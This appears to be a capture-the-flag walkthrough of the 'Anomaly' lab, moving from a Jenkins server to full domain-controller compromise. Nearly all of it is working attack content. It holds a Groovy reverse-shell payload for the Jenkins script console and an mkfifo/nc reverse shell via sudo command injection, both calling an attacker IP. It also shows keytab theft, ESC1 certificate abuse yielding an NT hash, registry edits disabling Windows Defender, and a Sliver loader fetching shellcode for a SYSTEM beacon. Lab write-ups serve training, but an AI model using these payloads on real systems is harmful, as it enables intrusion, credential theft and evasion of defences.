Anomaly

Objective/Scope

The core objective is to demonstrate the full impact of a successful network intrusion by achieving Domain Administrator privileges over the client's Active Directory environment. The test will simulate a motivated external attacker's progression from an initial foothold to complete administrative control.

The in-scope assets for this engagement include two critical IP addresses:

A hardened Ubuntu Server (Initial Foothold Target).
The primary Domain Controller (Final Privilege Escalation Target).

It is a critical finding that the Domain Controller is running active Antivirus (AV) software; therefore, this test will specifically involve techniques to bypass or evade the installed AV to successfully compromise the domain and demonstrate the potential for a full domain compromise.

Rustscan

❯ rustscan -a 10.1.189.11 -- -A -sC -Pn -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/tommy/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.1.189.11:22
Open 10.1.189.11:8080
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -sC -Pn -sV" on ip 10.1.189.11
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-19 20:48 -0500
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:48
Completed Parallel DNS resolution of 1 host. at 20:48, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 20:48
Scanning 10.1.189.11 [2 ports]
Discovered open port 22/tcp on 10.1.189.11
Discovered open port 8080/tcp on 10.1.189.11
Completed Connect Scan at 20:48, 0.05s elapsed (2 total ports)
Initiating Service scan at 20:48
Scanning 2 services on 10.1.189.11
Completed Service scan at 20:48, 6.39s elapsed (2 services on 1 host)
NSE: Script scanning 10.1.189.11.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:48
Completed NSE at 20:48, 1.69s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:48
Completed NSE at 20:48, 0.22s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
Nmap scan report for 10.1.189.11
Host is up, received user-set (0.044s latency).
Scanned at 2025-11-19 20:48:09 EST for 8s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 d0:6b:a8:3e:5f:e5:39:da:3d:a8:e2:fe:ec:9b:6b:f8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1Qh8/K7D2Ha0PIBFbht6MpYUpLS5PjttLq0+sZmnhg7CIqHLT3bmaWWn+lV834RW3yvGgLYqi1ZMW37WsKxVQ=
|   256 86:4d:ab:6d:b9:52:01:2f:1a:73:4c:53:4c:51:3a:7a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL+ih4bmqvxJ8cvYTjJrwQ3CKncqS4MAeUXaeIS0y5/2
8080/tcp open  http    syn-ack Jetty 10.0.20
|_http-server-header: Jetty(10.0.20)
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Jenkins (Port 8080)

Jenkins Website

Creds

Try admin:admin for Jenkins Login which works successfully.

Script Console for Reverse Shell (/script endpoint)

Navigate to the /script endpoint and use the payload below.

String host="10.200.19.169";int port=4444;String cmd="bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Setup Listener

❯ penelope -i tun0 -p 4444

tip

Penelope is a great reverse shell handler. It will attempt to automatically upgrade your shell. It also provides more features such as downloading/uploading files, which will be useful later on.

Check Sudo Commands

sudo -l to see what we can run

/usr/bin/router_config

Attempt to use it and it asks for a config.xml file. After some trial and error, I found out you can just give it commands (id, whoami, etc) instead of a config.xml file.

Reverse Shell as `root`

sudo router_config 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.200.19.169 4444 >/tmp/f'

Get back a reverse shell as root user.

user.txt

root@ip-10-1-189-11:~# cat user.txt
ZmxhZ3toMWRkM25fcjRuZDBtXzl4N3BRen0=

❯ echo 'ZmxhZ3toMWRkM25fcjRuZDBtXzl4N3BRen0=' | base64 -d
flag{h1dd3n_r4nd0m_9x7pQz}

Find Kerberos files

find /etc/krb5.conf file is setup for ANOMALY.HSM.

find /etc/krb5.keytab file.

Download krb5.keytab File

From penelope listener, press F12 to get back to menu. Then download the krb5.keytab file

(Penelope)─(Session [1])> download /etc/krb5.keytab

Extract Keys/Hash from Keytab File

Use the KeyTabExtract tool to attempt to extract the NTLM hash. We are not able to extract the NTLM Hash but we did get the AES256 Key which can be used to obtain a new TGT for Brandon_Boyd

❯ python extract.py krb5.keytab
[!] No RC4-HMAC located. Unable to extract NTLM hashes.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[!] Unable to identify any AES128-CTS-HMAC-SHA1 hashes.
[+] Keytab File successfully imported.
        REALM : ANOMALY.HSM
        SERVICE PRINCIPAL : Brandon_Boyd/
        AES-256 HASH : f9754c5288b844eb86054695b2c12b93716f57c41d26325c1a994e12bbbeff52
****

Get Ticket for `Brandon_Boyd`

❯ getTGT.py 'anomaly.hsm/brandon_boyd' -aesKey f9754c5288b844eb86054695b2c12b93716f57c41d26325c1a994e12bbbeff52

Enumerate Users

❯ nxc smb anomaly-dc.anomaly.hsm -k --use-kcache --users
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [*] Windows 11 / Server 2025 Build 26100 x64 (name:ANOMALY-DC) (domain:anomaly.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [+] ANOMALY.HSM\brandon_boyd from ccache 
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       Administrator                 2025-09-17 12:01:03 0       Built-in account for administering the computer/domain 
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       krbtgt                        2025-09-21 11:54:56 0       Key Distribution Center Service Account 
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       Brandon_Boyd                  2025-11-12 20:30:05 0       3edc4rfv#EDC$RFV 
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       anna_molly                    2025-11-12 20:29:16 0  

Find password for Brandon_Boyd in the description.

Gather Bloodhound Data

❯ nxc ldap 10.1.239.234 -u brandon_boyd -p '3edc4rfv#EDC$RFV' --bloodhound -c all --dns-server 10.1.239.234
❯ rusthound-ce --domain anomaly.hsm -f ANOMALY-DC.anomaly.hsm -k -no-pass

Find Paths to Domain Admins

Shortest Path to Domain Admins Domain Computers have ESC1 Edge over the Domain If we can create computer objects, we can abuse the ESC1 vulnerability.

Check MachineAccountQuota Attribute

❯ nxc ldap anomaly-dc.anomaly.hsm -k --use-kcache -M maq
LDAP        anomaly-dc.anomaly.hsm 389    ANOMALY-DC       [*] Windows 11 / Server 2025 Build 26100 (name:ANOMALY-DC) (domain:ANOMALY.HSM) (signing:Enforced) (channel binding:When Supported) 
LDAP        anomaly-dc.anomaly.hsm 389    ANOMALY-DC       [+] ANOMALY.HSM\brandon_boyd from ccache 
MAQ         anomaly-dc.anomaly.hsm 389    ANOMALY-DC       [*] Getting the MachineAccountQuota
MAQ         anomaly-dc.anomaly.hsm 389    ANOMALY-DC       MachineAccountQuota: 10

This is the default value and allow users to create up to 10 Machine Accounts.

Create Machine Account

❯ nxc smb anomaly-dc.anomaly.hsm -k --use-kcache -M add-computer -o NAME="TOMMYPC" PASSWORD="Password1!"
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [*] Windows 11 / Server 2025 Build 26100 x64 (name:ANOMALY-DC) (domain:anomaly.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [+] ANOMALY.HSM\brandon_boyd from ccache 
ADD-COMP... anomaly-dc.anomaly.hsm 445    ANOMALY-DC       Successfully added the machine account: "TOMMYPC$" with Password: "Password1!"

Find Vulnerable Template

❯ nxc ldap anomaly-dc.anomaly.hsm -k --use-kcache -M certipy-find
LDAP        anomaly-dc.anomaly.hsm 389    ANOMALY-DC       [*] Windows 11 / Server 2025 Build 26100 (name:ANOMALY-DC) (domain:ANOMALY.HSM) (signing:Enforced) (channel binding:When Supported) 
LDAP        anomaly-dc.anomaly.hsm 389    ANOMALY-DC       [+] ANOMALY.HSM\brandon_boyd from ccache 
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC       Certificate Authorities
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC         0
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           CA Name                             : anomaly-ANOMALY-DC-CA-2
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           DNS Name                            : Anomaly-DC.anomaly.hsm
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Certificate Subject                 : CN=anomaly-ANOMALY-DC-CA-2, DC=anomaly, DC=hsm
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Certificate Serial Number           : 3F1A258E7CADC7AE4C54650883521D22
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Certificate Validity Start          : 2025-09-21 21:25:39+00:00
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Certificate Validity End            : 2124-09-21 21:35:38+00:00
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Web Enrollment
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC             HTTP
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Enabled                         : False
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC             HTTPS
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Enabled                         : False
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           User Specified SAN                  : Disabled
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Request Disposition                 : Issue
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Enforce Encryption for Requests     : Enabled
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Permissions
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC             Owner                             : ANOMALY.HSM\Administrators
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC             Access Rights
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               ManageCa                        : ANOMALY.HSM\Administrators
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Domain Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Enterprise Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               ManageCertificates              : ANOMALY.HSM\Administrators
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Domain Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Enterprise Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Enroll                          : ANOMALY.HSM\Authenticated Users
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC       Certificate Templates
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC         0
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Template Name                       : CertAdmin
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Display Name                        : CertAdmin
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Certificate Authorities             : anomaly-ANOMALY-DC-CA-2
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Enabled                             : True
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Client Authentication               : True
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Enrollment Agent                    : False
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Any Purpose                         : False
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Enrollee Supplies Subject           : True
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Certificate Name Flag               : EnrolleeSuppliesSubject
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Enrollment Flag                     : IncludeSymmetricAlgorithms
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 PublishToDs
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Private Key Flag                    : ExportableKey
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Extended Key Usage                  : Client Authentication
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 Secure Email
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 Encrypting File System
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Requires Manager Approval           : False
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Requires Key Archival               : False
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Authorized Signatures Required      : 0
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Schema Version                      : 2
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Validity Period                     : 99 years
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Renewal Period                      : 650430 hours
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Minimum RSA Key Length              : 2048
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Template Created                    : 2025-09-21T17:57:59+00:00
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Template Last Modified              : 2025-09-21T17:58:00+00:00
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           Permissions
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC             Enrollment Permissions
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Enrollment Rights               : ANOMALY.HSM\Domain Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Enterprise Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC             Object Control Permissions
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Owner                           : ANOMALY.HSM\Administrator
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Full Control Principals         : ANOMALY.HSM\Domain Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Enterprise Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Domain Computers
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Write Owner Principals          : ANOMALY.HSM\Domain Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Enterprise Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Domain Computers
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Write Dacl Principals           : ANOMALY.HSM\Domain Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Enterprise Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Domain Computers
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC               Write Property Enroll           : ANOMALY.HSM\Domain Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC                                                 ANOMALY.HSM\Enterprise Admins
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           [+] User Enrollable Principals      : ANOMALY.HSM\Domain Computers
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           [+] User ACL Principals             : ANOMALY.HSM\Domain Computers
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC           [!] Vulnerabilities
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC             ESC1                              : Enrollee supplies subject and template allows client authentication.
CERTIPY-... anomaly-dc.anomaly.hsm 389    ANOMALY-DC             ESC4                              : User has dangerous permissions.

Abuse ESC1 Vulnerability

❯ certipy req -u 'TOMMYPC$'@anomaly.hsm -p Password1! -ca anomaly-ANOMALY-DC-CA-2 -target anomaly-dc.anomaly.hsm -template CertAdmin -upn anna_molly@ANOMALY.HSM -sid S-1-5-21-1496966362-3320961333-4044918980-1105

Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: anomaly-dc.anomaly.hsm.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: ANOMALY.HSM.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'anna_molly@ANOMALY.HSM'
[*] Certificate object SID is 'S-1-5-21-1496966362-3320961333-4044918980-1105'
[*] Saving certificate and private key to 'anna_molly.pfx'
[*] Wrote certificate and private key to 'anna_molly.pfx'

You must add -sid S-1-5-21-1496966362-3320961333-4044918980-1105 (found in bloodhound data) for the next auth portion to work properly.

❯ certipy auth -pfx anna_molly.pfx -dc-ip 10.1.239.234
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'anna_molly@ANOMALY.HSM'
[*]     SAN URL SID: 'S-1-5-21-1496966362-3320961333-4044918980-1105'
[*]     Security Extension SID: 'S-1-5-21-1496966362-3320961333-4044918980-1105'
[*] Using principal: 'anna_molly@anomaly.hsm'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'anna_molly.ccache'
[*] Wrote credential cache to 'anna_molly.ccache'
[*] Trying to retrieve NT hash for 'anna_molly'
[*] Got hash for 'anna_molly@anomaly.hsm': aad3b435b51404eeaad3b435b51404ee:be4bf3131851aee9a424c58e02879f6e

Get root.txt

This part was a little more challenging than usual. Port 5985 wasnt open, so no Evil-WinRM. Impacket's psexec, smbexec, and wmiexec were all failing due to the AV that is enabled. I had limited success with NetExec with the smbexec and atexec methods (I believe this is still using Impacket under the hood). But even so, this only worked once and couldnt be used again.

❯ nxc smb anomaly-dc.anomaly.hsm -k --use-kcache -x 'type c:\users\administrator\desktop\root.txt' --exec-method smbexec
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [*] Windows 11 / Server 2025 Build 26100 x64 (name:ANOMALY-DC) (domain:anomaly.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [+] ANOMALY.HSM\anna_molly from ccache (Pwn3d!)
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [+] Executed command via smbexec
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       ZmxhZ3t3aW5kb3dzX2FkbWluXzdmOWIyWH0=

❯ echo 'ZmxhZ3t3aW5kb3dzX2FkbWluXzdmOWIyWH0=' | base64 -d
flag{windows_admin_7f9b2X}

BONUS (Sliver beacon as `SYSTEM`)

Disable Windows Defender

❯ reg.py ANOMALY.HSM/anna_molly@anomaly-dc.anomaly.hsm -k -no-pass query \
           -keyName 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender'

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender

❯ reg.py ANOMALY.HSM/anna_molly@anomaly-dc.anomaly.hsm -k -no-pass add \
         -keyName 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' \
         -v DisableRealtimeMonitoring \
         -vd 1 \
         -vt REG_DWORD

Successfully set
        key     HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableRealtimeMonitoring
        type    REG_DWORD
        value   1

❯ reg.py ANOMALY.HSM/anna_molly@anomaly-dc.anomaly.hsm -k -no-pass add \
         -keyName 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' \
         -v DisableAntiSpyware \
         -vd 1 \
         -vt REG_DWORD

Successfully set
        key     HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
        type    REG_DWORD
        value   1

Power off & on the machine

info

This was technically only needed to be able to get command execution to get my sliver payload to execute. These keys are deleted automatically after a short period of time, but my Sliver payload goes undetected.

Upload Sliver Loader

❯ smbclient.py -k -no-pass anna_molly@anomaly-dc

# cd Temp
# put stealth.exe
# ls
drw-rw-rw-          0  Thu Nov 20 00:55:37 2025 .
drw-rw-rw-          0  Thu Nov 20 00:41:47 2025 ..
-rw-rw-rw-         80  Sun Sep 21 18:34:31 2025 Brandon_Boyd.keytab
-rw-rw-rw-     178176  Thu Nov 20 00:55:37 2025 stealth.exe

I placed stealth.exe into C:\Windows\Temp. stealth.exe is a custom Nim Loader for my Sliver shellcode...

Execute `stealth.exe`

❯ nxc smb anomaly-dc.anomaly.hsm -k --use-kcache -x 'C:\\Windows\\Temp\\stealth.exe' --exec-method atexec
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [*] Windows 11 / Server 2025 Build 26100 x64 (name:ANOMALY-DC) (domain:anomaly.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [+] ANOMALY.HSM\anna_molly from ccache (Pwn3d!)
SMB         anomaly-dc.anomaly.hsm 445    ANOMALY-DC       [+] Executed command via atexec

You can see below that it grabbed payload.bin (Sliver shellcode).

❯ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.1.239.234 - - [20/Nov/2025 00:56:09] "GET /payload.bin HTTP/1.1" 200 -

Sliver beacon as `SYSTEM`

[*] Beacon a7a6de34 ALLEGED_JUNK - 10.1.239.234:49754 (Anomaly-DC) - windows/amd64 - Thu, 20 Nov 2025 00:56:13 EST

sliver > beacons

  ID         Name           Transport   Hostname     Username              Operating System   Last Check-In   Next Check-In 
========== ============== =========== ============ ===================== ================== =============== ===============
 a7a6de34   ALLEGED_JUNK   mtls        Anomaly-DC   NT AUTHORITY\SYSTEM   windows/amd64      12s             1m1s          



sliver (ALLEGED_JUNK) > info

         Beacon ID: a7a6de34-d073-484e-a4d9-a13c5c04e3ba
              Name: ALLEGED_JUNK
          Hostname: Anomaly-DC
              UUID: ec297eae-32bc-4e87-5d0a-65704d4e1b4e
          Username: NT AUTHORITY\SYSTEM
               UID: S-1-5-18
               GID: S-1-5-18
               PID: 3888
                OS: windows
           Version: Server 2016 build 26100 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.200.19.169:8888
    Remote Address: 10.1.239.234:49754
         Proxy URL: 
          Interval: 1m0s
            Jitter: 30s
     First Contact: Thu Nov 20 00:56:13 EST 2025 (5m43s ago)
      Last Checkin: Thu Nov 20 01:01:07 EST 2025 (49s ago)
      Next Checkin: Thu Nov 20 01:02:20 EST 2025 (in 24s)

root.txt

sliver (ALLEGED_JUNK) > cd C:\\Users\\Administrator\\Desktop

[*] Tasked beacon ALLEGED_JUNK (686c0033)

[+] ALLEGED_JUNK completed task 686c0033

[*] C:\Users\Administrator\Desktop

sliver (ALLEGED_JUNK) > cat root.txt

[*] Tasked beacon ALLEGED_JUNK (c5f6428a)

[+] ALLEGED_JUNK completed task c5f6428a

ZmxhZ3t3aW5kb3dzX2FkbWluXzdmOWIyWH0=

Objective/Scope​

Rustscan​

Jenkins (Port 8080)​

Creds​

Script Console for Reverse Shell (/script endpoint)​

Setup Listener​

Check Sudo Commands​

Reverse Shell as root​

user.txt​

Find Kerberos files​

Download krb5.keytab File​

Extract Keys/Hash from Keytab File​

Get Ticket for Brandon_Boyd​

Enumerate Users​

Gather Bloodhound Data​

Find Paths to Domain Admins​

Check MachineAccountQuota Attribute​

Create Machine Account​

Find Vulnerable Template​

Abuse ESC1 Vulnerability​

Get root.txt​

BONUS (Sliver beacon as SYSTEM)​

Disable Windows Defender​

Upload Sliver Loader​

Execute stealth.exe​

Sliver beacon as SYSTEM​

root.txt​